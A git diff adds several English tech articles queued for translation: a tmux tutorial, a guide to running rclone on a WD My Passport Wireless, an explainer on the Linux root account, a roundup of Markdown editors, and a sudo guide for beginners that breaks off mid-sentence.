@@ -0,0 +1,127 @@ +# [Use tmux for a more powerful terminal][3] + + + ![](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/tmux-945x400.jpg) + +Some Fedora users spend most or all their time at a [command line][4] terminal. The terminal gives you access to your whole system, as well as thousands of powerful utilities. However, it only shows you one command line session at a time by default. Even with a large terminal window, the entire window only shows one session. This wastes space, especially on large monitors and high resolution laptop screens. But what if you could break up that terminal into multiple sessions? This is precisely where  _tmux_  is handy — some say indispensable. + +### Install and start  _tmux_ + +The  _tmux_  utility gets its name from being a terminal muxer, or multiplexer. In other words, it can break your single terminal session into multiple sessions. It manages both  _windows_  and  _panes_ : + +* A  _window_  is a single view — that is, an assortment of things shown in your terminal. +* A  _pane_  is one part of that view, often a terminal session. + +To get started, install the  _tmux_  utility on your system. You’ll need to have  _sudo_  setup for your user account ([check out this article][5] for instructions if needed). + +``` +sudo dnf -y install tmux +``` + +Run the utility to get started: + +tmux + +### The status bar + +At first, it might seem like nothing happens, other than a status bar that appears at the bottom of the terminal: + + ![Start of tmux session](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/Screenshot-from-2017-02-04-12-54-41.png) + +The bottom bar shows you: + +* _[0] _ – You’re in the first session that was created by the  _tmux_  server. Numbering starts with 0\. The server tracks all sessions whether they’re still alive or not. +* _0:username@host:~_  – Information about the first window of that session. Numbering starts with 0\. The terminal in the active pane of the window is owned by  _username_  at hostname  _host_ . The current directory is  _~ _ (the home directory). +* _*_  – Shows that you’re currently in this window. +* _“hostname” _ – the hostname of the  _tmux_  server you’re using. +* Also, the date and time on that particular host is shown. + +The information bar will change as you add more windows and panes to the session. + +### Basics of tmux + +Stretch your terminal window to make it much larger. Now let’s experiment with a few simple commands to create additional panes. All commands by default start with  _Ctrl+b_ . + +* Hit  _Ctrl+b, “_  to split the current single pane horizontally. Now you have two command line panes in the window, one on top and one on bottom. Notice that the new bottom pane is your active pane. +* Hit  _Ctrl+b, %_  to split the current pane vertically. Now you have three command line panes in the window. The new bottom right pane is your active pane. + + ![tmux window with three panes](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/Screenshot-from-2017-02-04-12-54-59.png) + +Notice the highlighted border around your current pane. To navigate around panes, do any of the following: + +* Hit  _Ctrl+b _ and then an arrow key. +* Hit  _Ctrl+b, q_ . Numbers appear on the panes briefly. During this time, you can hit the number for the pane you want. + +Now, try using the panes to run different commands. For instance, try this: + +* Use  _ls_  to show directory contents in the top pane. +* Start  _vi_  in the bottom left pane to edit a text file. +* Run  _top_  in the bottom right pane to monitor processes on your system. + +The display will look something like this: + + ![tmux session with three panes running different commands](https://cdn.fedoramagazine.org/wp-content/uploads/2017/01/Screenshot-from-2017-02-04-12-57-51.png) + +So far, this example has only used one window with multiple panes. You can also run multiple windows in your session. + +* To create a new window, hit  _Ctrl+b, c._  Notice that the status bar now shows two windows running. (Keen readers will see this in the screenshot above.) +* To move to the previous window, hit  _Ctrl+b, p._ +* If you want to move to the next window, hit  _Ctrl+b, n_ . +* To immediately move to a specific window (0-9), hit  _Ctrl+b_  followed by the window number. + +If you’re wondering how to close a pane, simply quit that specific command line shell using  _exit_ ,  _logout_ , or  _Ctrl+d._  Once you close all panes in a window, that window disappears as well. + +### Detaching and attaching + +One of the most powerful features of  _tmux_  is the ability to detach and reattach to a session. You can leave your windows and panes running when you detach. Moreover, you can even logout of the system entirely. Then later you can login to the same system, reattach to the  _tmux_  session, and see all your windows and panes where you left them. The commands you were running stay running while you’re detached. + +To detach from a session, hit  _Ctrl+b, d._  The session disappears and you’ll be back at the standard single shell. To reattach to the session, use this command: + +``` +tmux attach-session +``` + +This function is also a lifesaver when your network connection to a host is shaky. If your connection fails, all the processes in the session will stay running. Once your connection is back up, you can resume your work as if nothing happened. + +And if that weren’t enough, on top of multiple windows and panes per session, you can also run multiple sessions. You can list these and then attach to the correct one by number or name: + +``` +tmux list-sessions +``` + +### Further reading + +This article only scratches the surface of  _tmux’_ s capabilities. You can manipulate your sessions in many other ways: + +* Swap one pane with another +* Move a pane to another window (in the same or a different session!) +* Set keybindings that perform your favorite commands automatically +* Configure a  _~/.tmux.conf_  file with your favorite settings by default so each new session looks the way you like + +For a full explanation of all commands, check out these references: + +* The official [manual page][1] +* This [eBook][2] all about  _tmux_ + +-------------------------------------------------------------------------------- + +作者简介: + +Paul W. Frields has been a Linux user and enthusiast since 1997, and joined the Fedora Project in 2003, shortly after launch. He was a founding member of the Fedora Project Board, and has worked on documentation, website publishing, advocacy, toolchain development, and maintaining software. He joined Red Hat as Fedora Project Leader from February 2008 to July 2010, and remains with Red Hat as an engineering manager. He currently lives with his wife and two children in Virginia. + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/use-tmux-more-powerful-terminal/ + +作者:[Paul W. Frields][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org/author/pfrields/ +[1]:http://man.openbsd.org/OpenBSD-current/man1/tmux.1 +[2]:https://pragprog.com/book/bhtmux2/tmux-2 +[3]:https://fedoramagazine.org/use-tmux-more-powerful-terminal/ +[4]:http://www.cryptonomicon.com/beginning.html +[5]:https://fedoramagazine.org/howto-use-sudo/ diff --git a/sources/tech/20170210 WD My Passport Wireless Linux Hacks.md b/sources/tech/20170210 WD My Passport Wireless Linux Hacks.md new file mode 100644 index 0000000000..a3b2a31957 --- /dev/null +++ b/sources/tech/20170210 WD My Passport Wireless Linux Hacks.md @@ -0,0 +1,40 @@ +WD My Passport Wireless Linux Hacks +============================================================ + +While WD My Passport Wireless is a rather useful device in its own right, the fact that it powered by a lightweight yet complete Linux distribution means that its capabilities can be extended even further. Deploy, for example, [rclone][3] on the device, and you can back up the photos and raw files stored on the disk to any supported cloud storage service. + +Before you can do this, though, you need to connect the device to a Wi-Fi network and enable SSH (so that you can access the underlying Linux system via SSH). To connect the WD My Passport Wireless to you current Wi-Fi network, power the device and connect to the wireless hotspot it creates from your regular Linux machine. Open a browser, point it to _[http://mypassport.local][1]_, and log in to the device’s web interface. Switch to the Wi-Fi section, and connect to the existing your local Wi-Fi network. Switch then to the Admin section and enable SSH access. + + ![wd-mypassport-wireless-admin](https://scribblesandsnaps.files.wordpress.com/2017/02/wd-mypassport-wireless-admin.png?w=605) + +On your Linux machine, open the terminal and connect to the device using the `ssh root@mypassport.local` command. + +Deploying rclone then is a matter of running the following commands: + +| 123456789 | `curl -O http:``//downloads``.rclone.org``/rclone-current-linux-arm``.zip``unzip rclone-current-linux-arm.zip``cd` `rclone-*-linux-arm``cp` `rclone` `/usr/sbin/``chown` `root:root` `/usr/sbin/rclone``chmod` `755` `/usr/sbin/rclone``mkdir` `-p` `/usr/local/share/man/man1``sudo` `cp` `rclone.1` `/usr/local/share/man/man1/``sudo` `mandb` | + +Once you’ve done that, run the `rclone config` command. Since you are configuring rclone on a headless machine, follow the instructions on the [Remote Setup][4] page. You’ll find detailed information on configuring and using rclone in the [Linux Photography][5] book. + +You can put the WD My Passport Wireless to other practical uses, too. Since the device comes with Python, you can run scripts and Python-based web applications on the device. For example, you can deploy the simple [What’s in My Bag][6] application to track your photographic gear. + +| 12345 | `curl -LOk https:``//github``.com``/dmpop/wimb/archive/master``.zip``unzip master.zip``mv` `wimb-master/ wimb``cd` `wimb``curl -LOk https:``//github``.com``/bottlepy/bottle/raw/master/bottle``.py` | + +Run `./wimb.py` to start the app and point the browser to _[http://mypassport:8080/wimb][2]_ to access and use the application. + +-------------------------------------------------------------------------------- + +via: https://scribblesandsnaps.com/2017/02/10/wd-my-passport-wireless-linux-hacks/ + +作者:[Dmitri Popov ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://scribblesandsnaps.com/author/dmpop/ +[1]:http://mypassport.local/ +[2]:http://mypassport:8080/wimb +[3]:http://rclone.org/ +[4]:http://rclone.org/remote_setup/ +[5]:https://gumroad.com/l/linux-photography +[6]:https://github.com/dmpop/wimb diff --git a/sources/tech/20170211 Who Is Root Why Does Root Exist.md b/sources/tech/20170211 Who Is Root Why Does Root Exist.md new file mode 100644 index 0000000000..6cc81d543b --- /dev/null +++ b/sources/tech/20170211 Who Is Root Why Does Root Exist.md @@ -0,0 +1,83 @@ +zhb127 申请翻译 +Who Is Root? Why Does Root Exist? +============================================================ + +Have you ever wondered why there is a special account named `root` in Linux? Do you know what are the recommended best practices to use this account? Are you aware of the scenarios where it must be used and those where it doesn’t? If you answered “yes” to one or more of these questions, keep reading. + +In this post we will provide a reference with information about the root account that you will want to keep handy. + +### What is root? + +To begin, let us keep in mind that the hierarchy of directories in Unix-like operating systems has been designed as a tree-like structure. The starting point is a special directory represented by a forward slash `(/)` with all other directories initially branching off from it. Since this is analogous to an actual tree, `/` is called the root directory. + +In the following image we can see the output of: + +``` +$ tree -d / | less +``` + +which illustrates the analogy between `/` and the `root` of a tree. + +[ + ![Hierarchy of Directories in Linux](http://www.tecmint.com/wp-content/uploads/2017/02/Linux-root-Directory-Tree.png) +][1] + +Hierarchy of Directories in Linux + +Although the reasons behind the naming of the root account are not quite clear, it is likely due to the fact that root is the only account having write permissions inside `/`. + +Additionally, root has access to all files and commands in any Unix-like operating system and it is often referred to as the superuser for that reason. + +On a side note, the root directory `(/)` must not be confused with `/root`, which is the home directory of the root user. In fact, `/root` is a subdirectory of `/`. + +### Gaining Access to root Permissions + +When we talk about root (or superuser) privileges, we refer to the permissions that such account has on the system. These privileges include (but are not limited to) the ability to modify the system and to grant other users certain access permissions to its resources. + +The reckless use of this power can lead to system corruption at best and total failure at worst. That is why the following guidelines are accepted as best practices when it comes to accessing the privileges of the root account: + +Initially, use the root account to run visudo. Use that command to edit /etc/sudoers to grant the minimum superuser privileges that a given account (e.g. supervisor) needs. + +This may include, for example, the ability to [create (adduser)][2] and [modify (usermod) user accounts][3] – and nothing else. + +Moving forward, login as supervisor and [use sudo to perform user management tasks][4]. You will notice that attempting to perform other tasks that require superuser permissions (removing packages, for example) should fail. + +[ + ![Run Commands Without sudo Privileges](http://www.tecmint.com/wp-content/uploads/2017/02/Run-Commands-Without-sudo.png) +][5] + +Run Commands Without sudo Privileges + +Repeat the above two steps whenever needed, and once done, use the exit command to return to your unprivileged account immediately. + +At this point you should ask yourself, Are the any other tasks that pop up on a periodic basis that need superuser privileges? If so, grant the necessary permissions in /etc/sudoers either for a given account or group, and continue avoiding the use of the root account at the extent possible. + +##### Summary + +This post can serve as a reference for the proper use of the root account in a Unix-like operating system. Feel free to add it to your bookmarks and return as many times as you want! + +As always, drop us a note using the comment form below if you have any questions or suggestions about this article. We look forward to hearing from you! + +-------------------------------------------------------------------------------- + +作者简介: + +Gabriel Cánepa is a GNU/Linux sysadmin and web developer from Villa Mercedes, San Luis, Argentina. He works for a worldwide leading consumer product company and takes great pleasure in using FOSS tools to increase productivity in all areas of his daily work. + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/who-is-root-why-does-root-exist-in-linux/ + +作者:[Gabriel Cánepa][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/gacanepa/ + +[1]:http://www.tecmint.com/wp-content/uploads/2017/02/Linux-root-Directory-Tree.png +[2]:http://www.tecmint.com/add-users-in-linux/ +[3]:http://www.tecmint.com/usermod-command-examples/ +[4]:http://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/ +[5]:http://www.tecmint.com/wp-content/uploads/2017/02/Run-Commands-Without-sudo.png diff --git a/sources/tech/20170212 WRITE MARKDOWN WITH 8 EXCEPTIONAL OPEN SOURCE EDITORS.md b/sources/tech/20170212 WRITE MARKDOWN WITH 8 EXCEPTIONAL OPEN SOURCE EDITORS.md new file mode 100644 index 0000000000..78189e520d --- /dev/null +++ b/sources/tech/20170212 WRITE MARKDOWN WITH 8 EXCEPTIONAL OPEN SOURCE EDITORS.md @@ -0,0 +1,230 @@ +WRITE MARKDOWN WITH 8 EXCEPTIONAL OPEN SOURCE EDITORS +============================================================ + +### Markdown + +By way of a succinct introduction, Markdown is a lightweight plain text formatting syntax created by John Gruber together with Aaron Swartz. Markdown offers individuals “to write using an easy-to-read, easy-to-write plain text format, then convert it to structurally valid XHTML (or HTML)”. Markdown’s syntax consists of easy to remember symbols. It has a gentle learning curve; you can literally learn the Markdown syntax in the time it takes to fry some mushrooms (that’s about 10 minutes). By keeping the syntax as simple as possible, the risk of errors is minimized. Besides being a friendly syntax, it has the virtue of producing clean and valid (X)HTML output. If you have seen my HTML, you would know that’s pretty essential. + +The main goal for the formatting syntax is to make it extremely readable. Users should be able to publish a Markdown-formatted document as plain text. Text written in Markdown has the virtue of being easy to share between computers, smart phones, and individuals. Almost all content management systems support Markdown. It’s popularity as a format for writing for the web has also led to variants being adopted by many services such as GitHub and Stack Exchange. + +Markdown can be composed in any text editor. But I recommend an editor purposely designed for this syntax. The software featured in this roundup allows an author to write professional documents of various formats including blog posts, presentations, reports, email, slides and more. All of the applications are, of course, released under an open source license. Linux, OS X and Windows’ users are catered for. + +* * * + +### Remarkable + + ![Remarkable - cross-platform Markdown editor](https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/02/Remarkable.png?resize=800%2C319&ssl=1) + +Let’s start with Remarkable. An apt name. Remarkable is a reasonably featured Markdown editor – it doesn’t have all the bells and whistles, but there’s nothing critical missing. It has a syntax like Github flavoured markdown. + +With this editor you can write Markdown and view the changes as you make them in the live preview window. You can export your files to PDF (with a TOC) and HTML. There are multiple styles available along with extensive configuration options so you can configure it to your heart’s content. + +Other features include: + +* Syntax highlighting +* GitHub Flavored Markdown support +* MathJax support – render rich documents with advanced formatting +* Keyboard shortcuts + +There are easy installers available for Debian, Ubuntu, Fedora, SUSE and Arch systems. + +Homepage: [https://remarkableapp.github.io/][4] +License: MIT License + +* * * + +### Atom + + ![Atom - cross-platform Markdown editor](https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/02/Atom-Markdown.png?resize=800%2C328&ssl=1) + +Make no bones about it, Atom is a fabulous text editor. Atom consists of over 50 open source packages integrated around a minimal core. With Node.js support, and a full set of features, Atom is my preferred way to edit code. It features in our [Killer Open Source Apps][5], it is that masterly. But as a Markdown editor Atom leaves a lot to be desired – its default packages are bereft of Markdown specific features; for example, it doesn’t render equations, as illustrated in the graphic above. + +But here lies the power of open source and one of the reasons I’m a strong advocate of openness. There are a plethora of packages, some forks, which add the missing functionality. For example, Markdown Preview Plus provides a real-time preview of markdown documents, with math rendering and live reloading. Alternatively, you might try [Markdown Preview Enhanced][6]. If you need an auto-scroll feature, there’s [markdown-scroll-sync][7]. I’m a big fan of [Markdown-Writer][8] and [markdown-pdf][9] the latter converts markdown to PDF, PNG and JPEG on the fly. + +The approach embodies the open source mentality, allowing the user to add extensions to provide only the features needed. Reminds me of Woolworths pick ‘n’ mix sweets. A bit more effort, but the best outcome. + +Homepage: [https://atom.io/][10] +License: MIT License + +* * * + +### Haroopad + + ![Haroopad - - cross-platform Markdown editor](https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/02/Haroopad-1.png?resize=800%2C332&ssl=1) + +Haroopad is an excellent markdown enabled document processor for creating web-friendly documents. Author various formats of documents such as blog articles, slides, presentations, reports, and e-mail. Haroopad runs on Windows, Mac OS X, and Linux. There are Debian/Ubuntu packages, and binaries for Windows and Mac. The application uses node-webkit, CodeMirror, marked, and Twitter Bootstrap. + +Haroo means “A Day” in Korean. + +The feature list is rather impressive; take a look below: + +* Themes, Skins and UI Components + * Over 30 different themes to edit – tomorrow-night-bright and zenburn are recent additions + * Syntax highlighting in fenced code block on editor + * Ruby, Python, PHP, Javascript, C, HTML, CSS + * Based on CodeMirror, a versatile text editor implemented in JavaScript for the browser +* Live Preview themes + * 7 themes based markdown-css +* Syntax Highlighting + * 112 languages & 49 styles based on highlight.js +* Custom Theme + * Style based on CSS (Cascading Style Sheet) +* Presentation Mode – useful for on the spot presentations +* Draw diagrams – flowcharts, and sequence diagrams +* Tasklist +* Enhanced Markdown syntax with TOC, GitHub Flavored Markdown and extensions, mathematical expressions, footnotes, tasklists, and more +* Font Size + * Editor and Viewer font size control using Preference Window & Shortcuts +* Embedding Rich Media Contents + * Video, Audio, 3D, Text, Open Graph and oEmbed + * About 100 major internet services (YouTube, SoundCloud, Flickr …) Support + * Drag & Drop support +* Display Mode + * Default (Editor:Viewer), Reverse (Viewer:Editor), Only Editor, Only Viewer (View > Mode) +* Insert Current Date & Time + * Various Format support (Insert > Date & Time) +* HTML to Markdown + * Drag & Drop your selected text on Web Browser +* Options for markdown parsing +* Outline View +* Vim Key-binding for purists +* Markdown Auto Completion +* Export to PDF, HTML +* Styled HTML copy to clipboard for WYSIWYG editors +* Auto Save & Restore +* Document state information +* Tab or Spaces for Indentation +* Column (Single, Two and Three) Layout View +* Markdown Syntax Help Dialog. +* Import and Export settings +* Support for LaTex mathematical expressions using MathJax +* Export documents to HTML and PDF +* Build extensions for making your own feature +* Effortlessly transform documents into a blog system: WordPress, Evernote and Tumblr, +* Full screen mode – although the mode fails to hide the top menu bar or the bottom toolbar +* Internationalization support: English, Korean, Spanish, Chinese Simplified, German, Vietnamese, Russian, Greek, Portuguese, Japanese, Italian, Indonesian, Turkish, and French + +Homepage: [http://pad.haroopress.com/][11] +License: GNU GPL v3 + +* * * + +### StackEdit + + ![StackEdit - a web based Markdown editor](https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/02/StackEdit.png?resize=800%2C311&ssl=1) + +StackEdit is a full-featured Markdown editor based on PageDown, the Markdown library used by Stack Overflow and the other Stack Exchange sites. Unlike the other editors in this roundup, StackEdit is a web based editor. A Chrome app is also available. + +Features include: + +* Real-time HTML preview with Scroll Link feature to bind editor and preview scrollbars +* Markdown Extra/GitHub Flavored Markdown support and Prettify/Highlight.js syntax highlighting +* LaTeX mathematical expressions using MathJax +* WYSIWYG control buttons +* Configurable layout +* Theming support with different themes available +* A la carte extensions +* Offline editing +* Online synchronization with Google Drive (multi-accounts) and Dropbox +* One click publish on Blogger, Dropbox, Gist, GitHub, Google Drive, SSH server, Tumblr, and WordPress + +Homepage: [https://stackedit.io/][12] +License: Apache License + +* * * + +### MacDown + + ![MacDown - OS X Markdown editor](https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/02/MacDown.png?resize=800%2C422&ssl=1) + +MacDown is the only editor featured in this roundup which only runs on macOS. Specifically, it requires OS X 10.8 or later. Hoedown is used internally to render Markdown into HTML which gives an edge to its performance. Hoedown is a revived fork of Sundown, it is fully standards compliant with no dependencies, good extension support, and UTF-8 aware. + +MacDown is based on Mou, a proprietary solution designed for web developers. + +It offers good Markdown rendering, syntax highlighting for fenced code blocks with language identifiers rendered by Prism, MathML and LaTeX rendering, GTM task lists, Jekyll front-matter, and optional advanced auto-completion. And above all, it isn’t a resource hog. Want to write Markdown on OS X? MacDown is my open source recommendation for web developers. + +Homepage: [https://macdown.uranusjr.com/][13] +License: MIT License + +* * * + +### ghostwriter + + ![ghostwriter - cross-platform Markdown editor](https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/02/ghostwriter.png?resize=800%2C310&ssl=1) + +ghostwriter is a cross-platform, aesthetic, distraction-free Markdown editor. It has built-in support for the Sundown processor, but can also auto-detect Pandoc, MultiMarkdown, Discount and cmark processors. It seeks to be an unobtrusive editor. + +ghostwriter has a good feature set which includes syntax highlighting, a full-screen mode, a focus mode, themes, spell checking with Hunspell, a live word count, live HTML preview, and custom CSS style sheets for HTML preview, drag and drop support for images, and internalization support.  A Hemingway mode button disables backspace and delete keys. A new Markdown cheat sheet HUD window is a useful addition. Theme support is pretty basic, but there are some experimental themes available at this [GitHub repository][14]. + +ghostwriter is an under-rated utility. I have come to appreciate the versatility of this application more and more, in part because of its spartan interface helps the writer fully concentrate on curating content.  Recommended. + +ghostwriter is available for Linux and Windows. There is also a portable version available for Windows. + +Homepage: [https://github.com/wereturtle/ghostwriter][15] +License: GNU GPL v3 + +* * * + +### Abricotine + + ![Abricotine - cross-platform Markdown editor](https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/02/Abricotine.png?resize=800%2C316&ssl=1) + +Abricotine is a promising cross-platform open-source markdown editor built for the desktop. It is available for Linux, OS X and Windows. + +The application supports markdown syntax combined with some Github-flavored Markdown enhancements (such as tables). It lets users preview documents directly in the text editor as opposed to a side pane. + +The tool has a reasonable set of features including a spell checker, the ability to save documents as HTML or copy rich text to paste in your email client. You can also display a document table of content in the side pane, display syntax highlighting for code, as well as helpers, anchors and hidden characters. It is at a fairly early stage of development with some basic bugs that need fixing, but it is one to keep an eye on. There are 2 themes, with the ability to add your own. + +Homepage: [http://abricotine.brrd.fr/][16] +License: GNU General Public License v3 or later + +* * * + +### ReText + + ![ReText - Linux Markdown editor](https://i1.wp.com/www.ossblog.org/wp-content/uploads/2017/02/ReText.png?resize=800%2C270&ssl=1) + +ReText is a simple but powerful editor for Markdown and reStructuredText. It gives users the power to control all output formatting. The files it works with are plain text files, however it can export to PDF, HTML and other formats. ReText is officially supported on Linux only. + +Features include: + +* Full screen mode +* Live previews +* Synchronised scrolling (for Markdown) +* Support for math formulas +* Spell checking +* Page breaks +* Export to HTML, ODT and PDF +* Use other markup languages + +Homepage: [https://github.com/retext-project/retext][17] +License: GNU GPL v2 or higher + +-------------------------------------------------------------------------------- + +via: https://www.ossblog.org/markdown-editors/ + +作者:[Steve Emms ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ossblog.org/author/steve/ +[1]:https://www.ossblog.org/author/steve/ +[2]:https://www.ossblog.org/markdown-editors/#comments +[3]:https://www.ossblog.org/category/utilities/ +[4]:https://remarkableapp.github.io/ +[5]:https://www.ossblog.org/top-software/2/ +[6]:https://atom.io/packages/markdown-preview-enhanced +[7]:https://atom.io/packages/markdown-scroll-sync +[8]:https://atom.io/packages/markdown-writer +[9]:https://atom.io/packages/markdown-pdf +[10]:https://atom.io/ +[11]:http://pad.haroopress.com/ +[12]:https://stackedit.io/ +[13]:https://macdown.uranusjr.com/ +[14]:https://github.com/jggouvea/ghostwriter-themes +[15]:https://github.com/wereturtle/ghostwriter +[16]:http://abricotine.brrd.fr/ +[17]:https://github.com/retext-project/retext diff --git a/sources/tech/20170213 A beginners guide to understanding sudo on Ubuntu.md b/sources/tech/20170213 A beginners guide to understanding sudo on Ubuntu.md new file mode 100644 index 0000000000..e85f7b9f45 --- /dev/null +++ b/sources/tech/20170213 A beginners guide to understanding sudo on Ubuntu.md @@ -0,0 +1,226 @@ +A beginner's guide to understanding sudo on Ubuntu +============================================================ + +### On this page + +1. [What is sudo?][4] +2. [Can any user use sudo?][5] +3. [What is a sudo session?][6] +4. [The sudo password][7] +5. [Some important sudo command line options][8] + 1. [The -k option][1] + 2. [The -s option][2] + 3. [The -i option][3] +6. [Conclusion][9] + +Ever got a 'Permission denied' error while working on the Linux command line? Chances are that you were trying to perform an operation that requires root permissions. For example, the following screenshot shows the error being thrown when I was trying to copy a binary file to one of the system directories: + +[ + ![permission denied on the shell](https://www.howtoforge.com/images/sudo-beginners-guide/perm-denied-error.png) +][11] + +So what's the solution to this problem? Simple, use the **sudo** command. + +[ + ![run command with sudo](https://www.howtoforge.com/images/sudo-beginners-guide/sudo-example.png) +][12] + +The user who is running the command will be prompted for their login password. Once the correct password is entered, the operation will be performed successfully. + +While sudo is no doubt a must-know command for any and everyone who works on the command line in Linux, there are several other related (and in-depth) details that you should know in order to use the command more responsibly and effectively.  And that's exactly what we'll be discussing here in this article. + +But before we move ahead, it's worth mentioning that all the commands and instructions mentioned in this article have been tested on Ubuntu 14.04LTS with Bash shell version 4.3.11. + +### What is sudo? + +The sudo command, as most of you might already know, is used to execute a command with elevated privileges (usually as root). An example of this we've already discussed in the introduction section above. However, if you want, you can use sudo to execute command as some other (non-root) user. + +This is achieved through the -u command line option the tool provides. For example, in the example shown below, I (himanshu) tried renaming a file in some other user's (howtoforge) home directory, but got a 'permission denied' error. And then I tried the same 'mv' command with 'sudo -u howtoforge,' the command was successful: + +[ + ![What is sudo](https://www.howtoforge.com/images/sudo-beginners-guide/sudo-switch-user.png) +][13] + +### Can any user use sudo? + +No. For a user to be able to use sudo, an entry corresponding to that user should be in the /etc/sudoers file. The following paragraph - taken from Ubuntu's website - should make it more clear: + +``` +The /etc/sudoers file controls who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands. The file is composed of aliases (basically variables) and user specifications (which control who can run what). +``` + +If you are using Ubuntu, it's easy to make sure that a user can run the sudo command: all you have to do is to make that user account type 'administrator'. This can be done by heading to System Settings... -> User Accounts. + +[ + ![sudo users](https://www.howtoforge.com/images/sudo-beginners-guide/sudo-user-accounts.png) +][14] + +Unlocking the window: + +[ + ![unlocking window](https://www.howtoforge.com/images/sudo-beginners-guide/sudo-user-unlock.png) +][15] + +Then selecting the user whose account type you want to change, and then changing the type to 'administrator' + +[ + ![choose sudo accounts](https://www.howtoforge.com/images/sudo-beginners-guide/sudo-admin-account.png) +][16] + +However, if you aren't on Ubuntu, or your distribution doesn't provide this feature, you can manually edit the /etc/sudoers file to make the change. You'll be required to add the following line in that file: + +``` +[user]    ALL=(ALL:ALL) ALL +``` + +Needless to say, [user] should be replaced by the user-name of the account you're granting the sudo privilege. An important thing worth mentioning here is that the officially suggested method of editing this file is through the **visudo** command - all you have to do is to run the following command: + +sudo visudo + +To give you an idea why exactly is that the case, here's an excerpt from the visudo manual: + +``` +visudo edits the sudoers file in a safe fashion. visudo locks the sudoers file against multiple simultaneous edits, provides basic sanity checks, and checks for parse errors. If the sudoers file is currently being edited you will receive a message to try again later. +``` + +For more information on visudo, head [here][17]. + +### What is a sudo session? + +If you use the sudo command frequently, I am sure you'd have observed that after you successfully enter the password once, you can run multiple sudo commands without being prompted for the password. But after sometime, the sudo command asks for your password again. + +This behavior has nothing to do with the number of sudo-powered commands you run, but instead depends on time. Yes, by default, sudo won't ask for password for 15 minutes after the user has entered it once. Post these 15 minutes, you'll be prompted for password again. + +However, if you want, you can change this behavior. For this, open the /etc/sudoers file using the following command: + +sudo visudo + +And then go to the line that reads: + +``` +Defaults env_reset +``` + +[ + ![env_reset](https://www.howtoforge.com/images/sudo-beginners-guide/sudo-session-time-default.png) +][18] + +and add the following variable (highlighted in bold below) at the end of the line + +``` +Defaults env_reset,timestamp_timeout=[new-value] +``` + +The [new-value] field should be replaced by the number of minutes you want your sudo session to last. For example, I used the value 40. + +[ + ![sudo timeout value](https://www.howtoforge.com/images/sudo-beginners-guide/sudo-session-timeout.png) +][19] + +In case you want to get prompted for password every time you use the sudo command, then in that case you can assign the value '0' to this variable. And for those of you who want that their sudo session should never time out, you can assign the value '-1'. + +Please note that using timestamp_timeout with value '-1' is strongly discouraged. + +### The sudo password + +As you might have observed, whenever sudo prompts you for a password and you start entering it, nothing shows up - not even asterisks that's usually the norm. While that's not a big deal in general, some users may want to have the asterisks displayed for whatever reason. + +The good thing is that's possible and pretty easy to do. All you have to do is to change the following line in /etc/sudoers file: + +``` +Defaults        env_reset +``` + +to + +``` +Defaults        env_reset,pwfeedback +``` + +And save the file. + +Now, whenever you'll type the sudo password, asterisk will show up. + +[ + ![hide the sudo password](https://www.howtoforge.com/images/sudo-beginners-guide/sudo-password.png) +][20] + +### Some important sudo command line options + +Aside from the -u command line option (which we've already discussed at the beginning of this tutorial), there are some other important sudo command line options that deserve a mention. In this section, we will discuss some of those. + +### The -k option + +Consider a case where-in you've just run a sudo-powered command after entering your password. Now, as you already know, the sudo session remains active for 15-mins by default. Suppose during this session, you have to give someone access to your terminal, but you don't want them to be able to use sudo. What will you do? + +Thankfully, there exists a command line option -k that allows user to revoke sudo permission. Here's what the sudo man page has to say about this option: + +``` +-k, --reset-timestamp + +When used without a command, invalidates the user's cached credentials. In other words, the next time sudo is run a password will be required. This option does not require a password and was added to allow a user to revoke sudo permissions from a .logout file. + +When used in conjunction with a command or an option that may require a password, this option will cause sudo to ignore the user's cached credentials. As a result, sudo will prompt for a password (if one is required by the security policy) and will not update the user's cached credentials. +``` + +### The -s option + +There might be times when you work requires you to run a bucketload of commands that need root privileges, and you don't want to enter the sudo password every now and then. Also, you don't want to tweak the sudo session timeout limit by making changes to the /etc/sudoers file.  + +In that case, you may want to use the -s command line option of the sudo command. Here's how the sudo man page explains it: + +``` +-s, --shell + +Run the shell specified by the SHELL environment variable if it is set or the shell specified by the invoking user's password database entry. If a command is specified, it is passed to the shell for execution via the shell's -c option. If no command is specified, an interactive shell is executed. +``` + +So basically, what this command line option does is: + +* Launches a new shell - as for which shell, the SHELL env variable is referred. In case $SHELL is empty, the shell defined in the /etc/passwd file is picked up. +* If you're also passing a command name along with the -s option (for example: sudo -s whoami), then the actual command that gets executed is: sudo /bin/bash -c whoami. +* If you aren't trying to execute any other command (meaning, you're just trying to run sudo -s) then you get an interactive shell with root privileges. + +What's worth keeping in mind here is that the -s command line option gives you a shell with root privileges, but you don't get the root environment - it's your .bashrc that gets sourced. This means that, for example, in the new shell that sudo -s runs, executing the whoami command will still return your username, and not 'root'. + +### The -i option + +The -i option is similar to the -s option we just discussed. However, there are some differences. One of the key differences is that -i gives you the root environment as well, meaning your (user's) .bashrc is ignored. It's like becoming 